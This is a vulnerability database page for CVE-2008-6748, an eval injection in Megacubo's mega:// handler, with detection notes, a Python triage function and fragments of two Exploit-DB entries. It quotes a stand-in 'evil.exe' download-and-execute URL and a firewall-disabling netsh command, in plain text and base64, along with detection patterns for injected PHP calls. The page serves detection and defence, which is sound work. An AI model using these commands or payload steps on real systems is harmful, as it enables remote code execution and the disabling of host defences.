CVE-2008-6748
Published 2009-04-24
CVE-2008-6748: Eval injection vulnerability in Megacubo 5.0.7 allows remote attackers to inject and execute arbitrary PHP code via the play action in a mega:// URI.
Priority P357 · critical · 9.3 · CVSS 2.0
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 3.74% (88.5th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| megacubo | megacubo | — | — |
Detection & IOCs (extracted from sources)
- Monitor for processes spawned via the mega:// URI handler containing pipe characters and PHP function calls (e.g., system(), base64_decode(), fputs(), fopen(), file_get_contents()) in the URI path; this is the eval injection payload pattern.
- Detect mega:// URI scheme invocations from browsers (Internet Explorer, Firefox) that contain the string 'play|con..' followed by PHP code constructs; this is the specific exploit trigger pattern.
- Alert on creation of executable files at c:/Megacubo.exe by the Megacubo application process, as the exploit drops a downloaded payload to this hardcoded path.
- Detect execution of 'netsh firewall set opmode mode = disable' (base64: bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==) as a child process of Megacubo, indicating successful exploitation and firewall disablement.
- The exploit was tested specifically against Internet Explorer 7 and Mozilla Firefox 1.5 on Windows XP SP3; the mega:// URI handler registration is the attack surface, so scope detection to Windows hosts with Megacubo installed.
- Megacubo is described as a PHP + Winbinder application, meaning the eval injection executes within the embedded PHP runtime bundled with the desktop application, not a web server context.
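The detection notes above can be combined into one triage function over endpoint events. This is an added example, not a rule published for this CVE: the event field names (type, parent, image, cmdline, path), the rule names and the sample events are constructed for illustration, and the benign mega:// form in the first event is an assumption.

```python
import re
from urllib.parse import unquote

# PHP functions named in the detection notes above.
PHP_CALL = re.compile(r"\b(system|base64_decode|fputs|fopen|file_get_contents)\s*\(", re.I)
NETSH = re.compile(r"netsh\s+firewall\s+set\s+opmode\s+mode\s*=\s*disable", re.I)
NETSH_B64 = "bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ=="  # from the notes above
DROP_PATH = "c:/megacubo.exe"

def is_megacubo(name):
    return name.replace("\\", "/").lower().endswith("megacubo.exe")

def classify(event):
    """Return the names of the rules an event matches (empty list = no alert)."""
    hits = []
    cmd = unquote(event.get("cmdline", ""))  # browsers may percent-encode the URI
    start = cmd.lower().find("mega://")
    if start != -1:
        uri = cmd[start:]
        if "|" in uri and PHP_CALL.search(uri):
            hits.append("mega-uri-php-call")
        marker = uri.lower().find("play|con..")
        if marker != -1 and PHP_CALL.search(uri, marker):
            hits.append("mega-uri-play-trigger")
        if NETSH_B64 in uri:
            hits.append("mega-uri-firewall-b64")
    if is_megacubo(event.get("parent", "")) and NETSH.search(cmd):
        hits.append("megacubo-child-disables-firewall")
    if event.get("type") == "file_create" and is_megacubo(event.get("image", "")):
        if event.get("path", "").replace("\\", "/").lower() == DROP_PATH:
            hits.append("payload-drop-path")
    return hits

# Constructed events; "[elided]" stands in for content not reproduced here.
EVENTS = [
    {"type": "process", "parent": "firefox.exe", "image": "megacubo.exe",
     "cmdline": 'megacubo.exe "mega://play|Example TV"'},
    {"type": "process", "parent": "iexplore.exe", "image": "megacubo.exe",
     "cmdline": 'megacubo.exe "mega://play%7Ccon..[elided]system([elided])"'},
    {"type": "process", "parent": "megacubo.exe", "image": "netsh.exe",
     "cmdline": "netsh firewall set opmode mode = disable"},
    {"type": "file_create", "image": "megacubo.exe", "path": "C:\\Megacubo.exe"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(classify(ev) or "clean", "<-", ev.get("cmdline") or ev.get("path"))
```

The command line is percent-decoded before matching because a browser may hand the handler an encoded pipe character, which would otherwise slip past a literal 'play|con..' match.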
No detection rules found.
Exploit-DB
Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute
exploitdb·2009-01-01
---
Megacubo 5.0.7 download & Execute
by :JJunior
site: http://www.musicastop.com.br/
tested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3
software site: http://www.megacubo.net/tv/
download url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023
description:
"Megacubo is a IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows(2000,
XP and Vista)."
example exploit, download & Execute :
MegaCubo - download & Execute
// url download & exec code evil
evil = 'http://www.example.com/evil.exe';
// disable firewall encode base_64
firewall =
Exploit-DB
Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection
exploitdb·2008-12-30
---
pwn
# milw0rm.com [2008-12-30]
No writeups or analysis indexed.
- http://osvdb.org/51106
- http://retrogod.altervista.org/9sg_megacubo.html
- http://secunia.com/advisories/33326
- http://www.securityfocus.com/archive/1/499654/100/0/threaded
- http://www.securityfocus.com/bid/33062
- https://exchange.xforce.ibmcloud.com/vulnerabilities/47697
- https://www.exploit-db.com/exploits/7623
Published: 2009-04-24